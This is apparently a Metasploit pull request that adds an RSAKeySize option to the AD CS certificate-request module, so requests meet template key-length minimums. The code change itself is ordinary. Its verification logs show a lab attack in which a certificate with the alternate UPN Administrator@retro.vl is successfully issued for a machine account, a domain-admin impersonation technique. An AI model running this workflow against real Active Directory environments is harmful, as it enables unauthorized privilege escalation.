### PR TITLE
Add RSAKeySize option to satisfy AD CS template minimums

### DIFF
--- a/lib/msf/core/exploit/remote/ms_icpr.rb
+++ b/lib/msf/core/exploit/remote/ms_icpr.rb
@@ -54,7 +54,8 @@ module Exploit::Remote::MsIcpr
     ], Msf::Exploit::Remote::MsIcpr)
 
     register_advanced_options([
-      OptEnum.new('DigestAlgorithm', [ true, 'The digest algorithm to use', 'SHA256', %w[SHA1 SHA256] ])
+      OptEnum.new('DigestAlgorithm', [ true, 'The digest algorithm to use', 'SHA256', %w[SHA1 SHA256] ]),
+      OptInt.new('RSAKeySize', [ true, 'RSA key size in bits for CSR generation', 2048 ])
     ])
   end
 
@@ -133,7 +134,9 @@ module Exploit::Remote::MsIcpr
   end
 
   def do_request_cert(icpr, opts)
-    private_key = OpenSSL::PKey::RSA.new(2048)
+    rsa_key_size = opts[:rsa_key_size] || datastore['RSAKeySize']
+    private_key = OpenSSL::PKey::RSA.new(rsa_key_size)
+    vprint_status("RSA key size: #{rsa_key_size}")
     user = opts[:username] || datastore['SMBUser']
     status_msg = "Requesting a certificate for user #{user}"
     alt_dns = opts[:alt_dns] || (datastore['ALT_DNS'].blank? ? nil : datastore['ALT_DNS'])

--- a/lib/msf/core/exploit/remote/ms_icpr.rb
+++ b/lib/msf/core/exploit/remote/ms_icpr.rb
@@ -55,7 +55,7 @@ module Exploit::Remote::MsIcpr
 
     register_advanced_options([
       OptEnum.new('DigestAlgorithm', [ true, 'The digest algorithm to use', 'SHA256', %w[SHA1 SHA256] ]),
-      OptInt.new('RSAKeySize', [ true, 'RSA key size in bits for CSR generation', 2048 ])
+      OptEnum.new('RSAKeySize', [ true, 'RSA key size in bits for CSR generation', '2048', %w[1024 2048 3072 4096 8192] ])
     ])
   end
 
@@ -134,7 +134,7 @@ module Exploit::Remote::MsIcpr
   end
 
   def do_request_cert(icpr, opts)
-    rsa_key_size = opts[:rsa_key_size] || datastore['RSAKeySize']
+    rsa_key_size = (opts[:rsa_key_size] || datastore['RSAKeySize']).to_i
     private_key = OpenSSL::PKey::RSA.new(rsa_key_size)
     vprint_status("RSA key size: #{rsa_key_size}")
     user = opts[:username] || datastore['SMBUser']


### PR DESCRIPTION
## Summary

This change adds the `RSAKeySize` advanced option and uses it when generating the CSR key pair, allowing users to increase key size to meet certificate template minimums and avoid `CERTSRV_E_KEY_LENGTH` errors when 2048-bit keys are rejected, addressing errors such as:

```
msf auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 10.129.234.44
[-] 10.129.234.44:445 - There was an error while requesting the certificate.
[-] 10.129.234.44:445 - Denied by Policy Module
[-] 10.129.234.44:445 - Error details:
[-] 10.129.234.44:445 -   Source:  (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer.
[-] 10.129.234.44:445 -   HRESULT: (0x80094811) CERTSRV_E_KEY_LENGTH: The public key does not meet the minimum size required by the specified certificate template.
[-] 10.129.234.44:445 - Auxiliary aborted due to failure: unknown: The public key does not meet the minimum size required by the specified certificate template.
[*] Auxiliary module execution completed
```


## Verification

Verified on the HackTheBox Retro box.

#### Default `RSAKeySize` (2048) triggers `CERTSRV_E_KEY_LENGTH` on templates with higher minimums

```
msf auxiliary(admin/dcerpc/icpr_cert) > run verbose=true
[*] Running module against 10.129.234.44
[*] 10.129.234.44:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.129.234.44:445 - Binding to \cert...
[+] 10.129.234.44:445 - Bound to \cert
[*] 10.129.234.44:445 - RSA key size: 2048
[*] 10.129.234.44:445 - Requesting a certificate for user BANKING$ - alternate UPN: Administrator@retro.vl - digest algorithm: SHA256 - template: RetroClients
[-] 10.129.234.44:445 - There was an error while requesting the certificate.
[-] 10.129.234.44:445 - Denied by Policy Module
[-] 10.129.234.44:445 - Error details:
[-] 10.129.234.44:445 -   Source:  (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer.
[-] 10.129.234.44:445 -   HRESULT: (0x80094811) CERTSRV_E_KEY_LENGTH: The public key does not meet the minimum size required by the specified certificate template.
[-] 10.129.234.44:445 - Auxiliary aborted due to failure: unknown: The public key does not meet the minimum size required by the specified certificate template.
[*] Auxiliary module execution completed
```

#### `RSAKeySize=4096` succeeds and clears the key-length policy error.

```
msf auxiliary(admin/dcerpc/icpr_cert) > set RSAKeySize 4096
RSAKeySize => 4096
msf auxiliary(admin/dcerpc/icpr_cert) > run verbose=true
[*] Running module against 10.129.234.44
[*] 10.129.234.44:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.129.234.44:445 - Binding to \cert...
[+] 10.129.234.44:445 - Bound to \cert
[*] 10.129.234.44:445 - RSA key size: 4096
[*] 10.129.234.44:445 - Requesting a certificate for user BANKING$ - alternate UPN: Administrator@retro.vl - digest algorithm: SHA256 - template: RetroClients
[+] 10.129.234.44:445 - The requested certificate was issued.
[*] 10.129.234.44:445 - Certificate Policies:
[*] 10.129.234.44:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
[*] 10.129.234.44:445 -   * clientAuth
[*] 10.129.234.44:445 - Certificate UPN: Administrator@retro.vl
[*] 10.129.234.44:445 - Certificate URI: S-1-5-21-2983547755-698260136-4283918172-500
[!] 10.129.234.44:445 - No active DB -- Credential data will not be saved!
[*] 10.129.234.44:445 - Certificate stored at: /home/kali/.msf4/loot/20260118200041_default_10.129.234.44_windows.ad.cs_307454.pfx
[*] Auxiliary module execution completed
```

